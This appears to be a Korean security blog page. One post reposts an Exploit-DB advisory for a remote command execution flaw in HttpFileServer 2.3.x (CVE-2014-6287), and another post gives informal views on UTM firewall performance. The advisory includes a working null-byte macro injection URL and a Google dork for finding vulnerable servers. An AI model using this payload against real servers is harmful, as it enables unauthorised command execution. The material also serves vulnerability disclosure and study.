IT보안 잡담

Http File Server 2.3.x - Remote Command Execution

보안/웹 2014. 9. 16. 21:07

출처 : http://www.exploit-db.com

HttpFileServer 2.3.x 버전에서 Remote Command Execution 취약점이 확인이 되었습니다.

사용법은

http://localhost:80/search=%00{.exec|cmd.}

입니다

즉 hfs 시스템에서 파일을 검색하는 과정에서 파싱의 문자열 오류로 명령어가 입력이 되는 취약점 입니다.

아래는 전문입니다.

Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
 
issue exists due to a poor regex in the file ParserLib.pas
 
 
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
 
 
it will not handle null byte so a request to
 
http://localhost:80/search=%00{.exec|cmd.}
 
will stop regex from parse macro , and macro will be executed and remote code injection happen.

저작자표시 비영리 변경금지

'보안 > 웹' 카테고리의 다른 글

WordPress DDOS 공격 분석 (0)	2014.09.30
Bash Vulnerability CVE-2014-6271 Test Tool (0)	2014.09.26
Bash Environment Variables Code Injection Exploit (CVE-2014-6271) (0)	2014.09.26
Internet Explorer MS14-029 취약점 코드 (0)	2014.09.21
PhpWiki - Remote Command Execution (0)	2014.09.09

Posted by 비타민A

,

UTM 장비란 무엇인가??

주인장 발자취 2014. 9. 16. 20:37

안녕하세요

주인장입니다...

짜임세 있게 글을 올리기보다는 그냥 즉흥적으로 글을 올려서 나중에 정리를 하는게 더 편해서...두서없이 글을 써봅니다.

우선 UTM 장비 이야이가 왜 나왔는가 하면...제가 처음한일이 바로 UTM 장비 회수부터 시작을 해서 입니다..

그럼 본론으로 들어가서 UTM 장비란 무엇인가??

그건 한마디로 신형 방화벽....정도로 보시면 됩니다.

각 업체들 브로슈어 보면 화려하게 적혀저 있습니다.

그 장비 1대만 있으면 모든걸 다 처리할거 같은 스펙입니다...

뭐 따지고 보면 거짓말은 아닌데....실제 적용을 하기에는 무리가 많습니다.

왜인가 하면..성능...이 떨어집니다.

일단 실적용 수치를 보자면 각 장비업체에서 제일 작은 장비를 기준으로 보통 스루풋을 보게 되면 보통 100Mbps 정도의 수치를 최대치로 적혀저 있습니다.

그런데 모든 기능을 제외하고 단순 bypass 기능만으로도 저 수치가 안나옵니다..

대략 한 80M 정도??? 이건 상황에 따라 다른데 성능 부분에 대한 썰은 나중에 다시 풀기로 하고 여튼 그렇습니다...

그렇다면 여기서 방화벽 + 스팸 기능을 올리면 어떻게 되느냐???

대략 제가 보기로는 80M 에서 한 50M 전후 정도로 떨어집니다..

거기다 IPS 기능을 올리면 30M 정도로 떨어지고.. 또 VPN 까지 올리면..20M 정도 나오면 박수받을 수 있습니다

그리고 제일 치명적인 단점은...안전성이 떨어집니다....ㅡ.ㅡ..

보안장비에서 안전성이 제일 우선시 되어야 하는데 그게 많이 떨어집니다..

한 5년전쯤일인데 크게 개선이 되었다고 보기는 어려울거 같습니다.

그나마 현실적인게 100M 장비를 구입해서 방화벽 + IPS 모듈만 올리면 대략 40-60M 전후로 성능이 나오는데 이게 그나마 현실적입니다...

즉 사용은 가능하되 많이 쓰지 않는 기능입니다..

그러면 큰 처리용량을 사면 되지 않느냐..하는데...그러면 UTM의 합리적인 가격이 사라집니다.. 차라리 각 장비를 사서 운용하는게 더 이득인 상황이 되어버립니다..

그리고 요즘 신형장비는 모르겠는데 UTM 장비를 보게 되면 임베디드 리눅스를 거의 사용을 하는데 각 기능이 모듈 형태로 활성화가 되어서 안전성부분이 일정부분 보장은 되나 트래픽이 몰렸을떄..스파이크 현상이 나타났을때 해당 모듈이 죽어버리는 고질적인 문제가 있는 장비들도 있습니다.

뭐 이런 이야기도 나중에 썰을 풀겠습니다.

오늘은 여기까지만 하겠습니다..